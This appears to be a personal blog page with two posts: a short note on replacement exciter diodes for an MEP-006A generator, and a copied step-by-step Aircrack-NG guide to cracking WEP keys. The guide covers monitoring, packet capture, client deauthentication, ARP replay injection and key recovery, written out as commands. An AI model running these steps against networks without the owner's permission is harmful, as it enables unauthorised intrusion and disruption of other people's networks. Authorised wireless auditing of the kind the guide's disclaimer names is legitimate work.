MEP-006A Exciter Diodes

Here are the two diodes I selected to replace the failed ones in my MEP-006A Military 60kW generator.

http://www.mouser.com/Search/ProductDetail.aspx?R=1N1190Avirtualkey66430000virtualkey905-1N1190A

http://www.mouser.com/Search/ProductDetail.aspx?R=1N1190ARvirtualkey66430000virtualkey905-1N1190AR

 

You would need x3 of each and I recommend getting a spare if you aren’t familiar with proper torque and are prone to breaking studs off components. One is a reverse connection of the other (designed 1NxxxxR)

 

Specifications:

1N1190 / 1N1190R Data Sheets

 

 

Three of one type are on one side of the aluminium rectifier mount, and the other three are on the other side. Make sure you use plenty of thermal conduction grease when making the connection.

Using Intel PRO/Wireless 2200BG with AirCrack

Shamelessly copied from another wordpress for my personal notes.
HOWTO: Aircrack-NG (Simple Guide)

This HOWTO is widely based on Aircrack’s own documentation. In addition you’ll find the latest version of “Aircrack Next Generation” here and Aircrack-PTW here

Any suggestions for improvement are welcome. Aim is to keep this HOWTO as simple & comprehensive as possible as I believe that brevity is the soul of wit.

DISCLAIMER:
Note that you need formal permission from the owner of any wireless network you wish to audit. Under no circumstances must you compromise a network’s security prior to obtaining approval from the owner of the network, and no support will be given to users who seek to do otherwise.

GENERAL INFORMATION:
Generally speaking there are 3 types of attacks:

1. Brute force attack
2. Dictionary attack
3. Statistical attack

By exploiting several security weaknesses of the WEP protocol Aircrack NG makes use of a statistical method to recover WEP keys. Provided that you have collected a sufficient number of IVs (= Initialization Vectors) and depending on the length of the encryption key, determining the actual WEP key will take less than a minute on a common PC.

HARDWARE:
I assume that you have successfully patched the driver for your wireless adapter (e.g. Ralink chipset), so I won’t go into this. I have tested packet injection and decryption with:

1. Intel® PRO/Wireless 2200BG (IPW2200)
2. Linksys WUSB54G V4.0 (RT2570)

I recommend “Linksys WUSB54G V4.0″ as it has a decent reception and reasonable performance. If you need help patching & compiling from source, feel free to post your problems here as well.

PREREQUISITES:
1. This HOWTO was written for Aircrack-NG v0.9.1 & Aircrack-PTW v1.0.0 on Kubuntu Feisty Fawn 7.04 (32-bit).
2. ’00:09:5B:D7:43:A8′ is the MAC address of my network, so you need to replace it with your own.
3. ’00:00:00:00:00:00′ is the MAC address of the target client, NOT that of your own wireless card.

COMMAND LINE:
Please make sure that you stick to the exact sequence of actions and pay attention to section on MAC filtering.

  • 1. Enable monitoring with “airmon-ng” (screenshot #1):
    Quote:
    sudo airmon-ng start <interface> <channel>
  • 2. Packet capturing with “airodump-ng” (screenshot #2):
    Quote:
    sudo airodump-ng –channel <channel> –write <file_name> <interface>

    Alternatively, try this (to collect data from target network only and hence increase performance):

    Quote:
    sudo airodump-ng –channel <channel> –bssid 00:09:5B:D7:43:A8 –write<file_name> <interface>

    NOTE:
    –channel… Select preferred channel; optional, however, channel hopping severely impacts and thus slows down collection process.
    –bssid… MAC address of target access point; optional, however, specifying access point will improve performance of collection process.
    –write… Preferred file name; mandatory field (in our case).

  • 3.1. Now check if MAC filtering is enabled or turned off:
    Quote:
    sudo aireplay-ng -1 0 -e <target_essid> -a 00:09:5B:D7:43:A8 -h MY:MA:CA:DD:RE:SS <interface>

    NOTE:
    -1… ’0′ deauthenticates all clients.
    -e… ESSID of target access point.
    -a… MAC address of target access point.
    -h… MAC address of your choice.

  • 3.2. If the resulting output looks like this…
    Quote:
    18:22:32 Sending Authentication Request
    18:22:32 Authentication successful
    18:22:32 Sending Association Request
    18:22:32 Association successful :-)

    …then MAC filtering is turned off & you can continue following section ‘No MAC filtering’, otherwise jump to section ‘MAC filtering’.

>> No MAC filtering <<

  • 4. Packet Re-injection with “aireplay-ng” (screenshot #4):
    Quote:
    sudo aireplay-ng -3 -b 00:09:5B:D7:43:A8 -h MY:MA:CA:DD:RE:SS<interface>

    You’ll now see the number of data packets shooting up in ‘airodump-ng’. This process can take up to five minutes before you start receiving any ARP requests. So be a little patient at this point. As MAC filtering is off, use an arbitrary MAC address (‘MY:MA:CA:DD:RE:SS’).

    Continue with #6.

    NOTE:
    -3… Standard ARP-request replay.
    -b… MAC address of target access point.
    -h… MAC address of your choice.

>> MAC filtering <<

  • 4. Deauthentication with “aireplay-ng” (screenshot #3):
    Quote:
    sudo aireplay-ng -0 5 -a 00:09:5B:D7:43:A8 -c 00:00:00:00:00:00 <interface>

    NOTE:
    -0… Number of deauthentication attempts.
    -a… MAC address of target access point.
    -c… Client MAC address.

  • 5. Packet Re-injection with “aireplay-ng” (screenshot #4):
    Quote:
    sudo aireplay-ng -3 -b 00:09:5B:D7:43:A8 -h 00:00:00:00:00:00 <interface>

    You’ll now see the number of data packets shooting up in ‘airodump-ng’. This process can take up to five minutes before you start receiving any ARP requests. So be a little patient at this point.

    NOTE:
    -3… Standard ARP-request replay.
    -b… MAC address of target access point.
    -h… Client MAC address.

  • 6. Decryption with “aircrack-ng” & “aircrack-ptw” (screenshot #5):Aircrack-ng:
    Quote:
    sudo aircrack-ng <file_name>.cap

    Aircrack-PTW:

    Quote:
    ./aircrack-ptw <file_name>.cap

CAPTURING:
This is a summary based on information given here and there, respectively:

Aircrack-NG:
64-bit key: ~250,000 packets
128-bit key: ~1,500,000 packets

Aircrack-PTW:
64-bit key: ~20,000 packets [estimate]
128-bit key: ~85,000 packets

FINALLY:
That’s it. I am open for further suggestions and hope to gain as much input as possible so that we can improve this guide and at the same time, keep it as simple as possible for other users.